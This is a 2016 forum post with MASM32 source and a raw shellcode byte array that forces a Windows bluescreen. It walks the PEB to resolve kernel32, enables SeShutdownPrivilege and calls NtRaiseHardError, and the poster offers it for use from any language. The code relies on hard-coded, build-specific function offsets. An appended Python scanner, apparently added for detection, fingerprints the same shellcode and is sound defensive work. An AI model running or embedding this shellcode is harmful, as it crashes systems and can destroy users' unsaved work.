Force Bluescreen | Shellcode + Masm32 | Windows 10-19-2016, 12:18 AM
#1
Yo.
So I was toying around with shellcode and figured this was something I may need at some point down the line.
I couldn't figure out a good way to store a byte array in a locally defined variable nicely, so I kinda had to hack it together, but it still works nonetheless.
How it do:
1: Get Kernel32 offset
2: Invoke LoadLibraryA to load NtDll
3: RtlAdjustPrivileges
4: NtRaiseHardError
After that, I just disassembled the file and got the opcodes and made them into an array, and you can call it from whatever language you like!
MASM32:
Code:
.386
.model flat, stdcall
option casemap: none

.code

; CBO: call Base + Off through EAX (Base is a register holding a module base, Off a hard-coded RVA)
CBO MACRO Base, Off
    MOV EAX, Base
    ADD EAX, Off
    CALL EAX
ENDM

start:
main PROC
    LOCAL NTDLL                     ; holds the address of the inline "ntdll.dll" string
    CALL @F                         ; CALL/POP trick: EAX = address of the POP below
@@:
    POP EAX
    JMP @F                          ; jump over the string data
    DB "ntdll.dll",0
@@:
    ADD EAX, 3                      ; POP (1 byte) + short JMP (2 bytes) sit before the string
    MOV NTDLL, EAX

    assume fs: nothing              ; Get Kernel32 Base by walking the PEB loader list
    MOV EAX, DWORD PTR fs:[30h]     ; PEB
    MOV EAX, DWORD PTR DS:[EAX+0Ch] ; PEB->Ldr
    MOV EAX, DWORD PTR DS:[EAX+14h] ; Ldr->InMemoryOrderModuleList.Flink (1st entry: the exe itself)
    MOV EAX, DWORD PTR DS:[EAX]     ; 2nd entry: ntdll.dll
    MOV EAX, DWORD PTR DS:[EAX]     ; 3rd entry: kernel32.dll
    MOV EAX, DWORD PTR DS:[EAX+10h] ; DllBase of that entry
    MOV EDI, EAX                    ; EDI = kernel32 base

    PUSH NTDLL
    CBO EDI, 84343                  ; LoadLibraryA (RVA hard-coded for the poster's kernel32 build)
    MOV EBP, EAX                    ; EBP = ntdll base (the frame pointer is deliberately sacrificed)

    LEA ESI, [ESP+20]               ; scratch DWORD on the stack for the BOOLEAN out-param
    PUSH ESI                        ; &Enabled
    PUSH 0                          ; CurrentThread = FALSE
    PUSH 1                          ; Enable = TRUE
    PUSH 19                         ; Privilege = SeShutdownPrivilege
    CBO EBP, 729296                 ; RtlAdjustPrivilege (RVA hard-coded for the poster's ntdll build)

    LEA ESI, [ESP+20]               ; scratch DWORD on the stack for the Response out-param
    PUSH ESI                        ; &Response
    PUSH 6                          ; ValidResponseOptions = OptionShutdownSystem
    PUSH 0                          ; Parameters
    PUSH 0                          ; UnicodeStringParameterMask
    PUSH 0                          ; NumberOfParameters
    PUSH 3290458473                 ; ErrorStatus = 0C4206969h
    CBO EBP, 136724                 ; NtRaiseHardError (RVA hard-coded for the poster's ntdll build)
    RET                             ; not reached once the hard error takes the system down
main ENDP
end start
Shellcode:
Code:
.386
.model flat, stdcall
option casemap: none

.data
; Opcodes of main from the MASM32 listing above (114 bytes)
dat \
db 055h, 08Bh, 0ECh, 083h, 0C4h, 0FCh, 0E8h, 000h, 000h, 000h, 000h, 058h, 0EBh, 00Ah, 06Eh, 074h
db 064h, 06Ch, 06Ch, 02Eh, 064h, 06Ch, 06Ch, 000h, 083h, 0C0h, 003h, 089h, 045h, 0FCh, 064h, 0A1h
db 030h, 000h, 000h, 000h, 08Bh, 040h, 00Ch, 08Bh, 040h, 014h, 08Bh, 000h, 08Bh, 000h, 08Bh, 040h
db 010h, 08Bh, 0F8h, 0FFh, 075h, 0FCh, 08Bh, 0C7h, 005h, 077h, 049h, 001h, 000h, 0FFh, 0D0h, 08Bh
db 0E8h, 08Dh, 074h, 024h, 014h, 056h, 06Ah, 000h, 06Ah, 001h, 06Ah, 013h, 08Bh, 0C5h, 005h, 0D0h
db 020h, 00Bh, 000h, 0FFh, 0D0h, 08Dh, 074h, 024h, 014h, 056h, 06Ah, 006h, 06Ah, 000h, 06Ah, 000h
db 06Ah, 000h, 068h, 069h, 069h, 020h, 0C4h, 08Bh, 0C5h, 005h, 014h, 016h, 002h, 000h, 0FFh, 0D0h
db 0C9h, 0C3h

.code
start:
    LEA EAX, dat    ; EAX = address of the byte array; this stub only takes the address, it does not run it
end start
(This post was last modified: 10-19-2016, 12:18 AM by Killpot.)
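From the triage side, the byte array above carries a handful of static fingerprints worth keying a detection or an analyst note on: the PEB walk that resolves kernel32 (`mov eax, fs:[30h]` followed by the Ldr and InMemoryOrderModuleList loads), the `mov eax, reg / add eax, imm32 / call eax` idiom with hard-coded RVAs, the `push 19` (SeShutdownPrivilege) handed to RtlAdjustPrivilege, and the `push 6` (OptionShutdownSystem) plus status value handed to NtRaiseHardError. The following scanner is an added example, not the poster's code: it pulls those artefacts out of the 114 bytes transcribed from the post. The `CALL_RE` pattern and the immediate-push decoder are written for exactly this hand-rolled shellcode style (immediate pushes directly before the indirect call); they are a fingerprint for this family, not a general x86 disassembler.

```python
"""Static fingerprinting of the NtRaiseHardError shellcode posted above (added example)."""
import re
import struct
from dataclasses import dataclass

SE_SHUTDOWN_PRIVILEGE = 19      # LUID value of SeShutdownPrivilege
OPTION_SHUTDOWN_SYSTEM = 6      # HARDERROR_RESPONSE_OPTION that makes NtRaiseHardError bug-check

# Byte array transcribed from the "Shellcode:" block of the post (sample input for the scanner).
SHELLCODE = bytes([
    0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xFC, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x58, 0xEB, 0x0A, 0x6E, 0x74,
    0x64, 0x6C, 0x6C, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x83, 0xC0, 0x03, 0x89, 0x45, 0xFC, 0x64, 0xA1,
    0x30, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x40, 0x14, 0x8B, 0x00, 0x8B, 0x00, 0x8B, 0x40,
    0x10, 0x8B, 0xF8, 0xFF, 0x75, 0xFC, 0x8B, 0xC7, 0x05, 0x77, 0x49, 0x01, 0x00, 0xFF, 0xD0, 0x8B,
    0xE8, 0x8D, 0x74, 0x24, 0x14, 0x56, 0x6A, 0x00, 0x6A, 0x01, 0x6A, 0x13, 0x8B, 0xC5, 0x05, 0xD0,
    0x20, 0x0B, 0x00, 0xFF, 0xD0, 0x8D, 0x74, 0x24, 0x14, 0x56, 0x6A, 0x06, 0x6A, 0x00, 0x6A, 0x00,
    0x6A, 0x00, 0x68, 0x69, 0x69, 0x20, 0xC4, 0x8B, 0xC5, 0x05, 0x14, 0x16, 0x02, 0x00, 0xFF, 0xD0,
    0xC9, 0xC3,
])

# mov eax, fs:[30h] ; mov eax, [eax+0Ch] ; mov eax, [eax+14h]   (PEB -> Ldr -> InMemoryOrderModuleList)
PEB_WALK = bytes.fromhex("64a130000000" "8b400c" "8b4014")

# Zero or more immediate pushes (6A ib / 68 id), then "mov eax, ebp|edi ; add eax, imm32 ; call eax".
CALL_RE = re.compile(rb"((?:\x6a.|\x68.{4})*)\x8b[\xc5\xc7]\x05(.{4})\xff\xd0", re.DOTALL)


@dataclass
class IndirectCall:
    offset: int
    rva: int
    pushes: list        # immediates in push order; the last push is the callee's first argument


def decode_pushes(raw: bytes) -> list:
    """Decode a run of 'push imm8' / 'push imm32' instructions into 32-bit values."""
    out, i = [], 0
    while i < len(raw):
        if raw[i] == 0x6A:                                    # push imm8, sign-extended to 32 bits
            out.append(struct.unpack_from("<b", raw, i + 1)[0] & 0xFFFFFFFF)
            i += 2
        else:                                                 # 0x68: push imm32
            out.append(struct.unpack_from("<I", raw, i + 1)[0])
            i += 5
    return out


def find_calls(blob: bytes) -> list:
    """Every 'mov eax, base ; add eax, RVA ; call eax' site with the immediates pushed before it."""
    return [IndirectCall(m.start(), struct.unpack("<I", m.group(2))[0], decode_pushes(m.group(1)))
            for m in CALL_RE.finditer(blob)]


def assess(blob: bytes) -> dict:
    """Summarise the artefacts a defender would write up for this sample."""
    calls = find_calls(blob)
    report = {
        "peb_walk_offset": blob.find(PEB_WALK),              # -1 when the kernel32 lookup is absent
        "hardcoded_rvas": [c.rva for c in calls],            # build-specific offsets, a brittle IoC
        "requests_shutdown_privilege": False,
        "hard_error_shutdown": False,
        "hard_error_status": None,
        "status_is_error_severity": False,
    }
    for c in calls:
        # RtlAdjustPrivilege(Privilege, Enable, CurrentThread, &Enabled): Privilege is the last push
        if len(c.pushes) == 3 and c.pushes[-1] == SE_SHUTDOWN_PRIVILEGE and c.pushes[-2] == 1:
            report["requests_shutdown_privilege"] = True
        # NtRaiseHardError(Status, NumParams, Mask, Params, ValidResponseOptions, &Response):
        # ValidResponseOptions is the first push, the NTSTATUS the last one
        if len(c.pushes) == 5 and c.pushes[0] == OPTION_SHUTDOWN_SYSTEM:
            report["hard_error_shutdown"] = True
            report["hard_error_status"] = c.pushes[-1]
            report["status_is_error_severity"] = (c.pushes[-1] >> 30) == 3   # top two bits = 11b
    return report


if __name__ == "__main__":
    for key, value in assess(SHELLCODE).items():
        print(f"{key}: {value if not isinstance(value, int) or isinstance(value, bool) else hex(value)}")
```

The report flags the combination that matters: a PEB walk, a SeShutdownPrivilege enable, and a hard error raised with OptionShutdownSystem. The three RVAs are the weakest indicator, since they only match the poster's exact DLL builds, which is also why this shellcode silently does the wrong thing on any other Windows build.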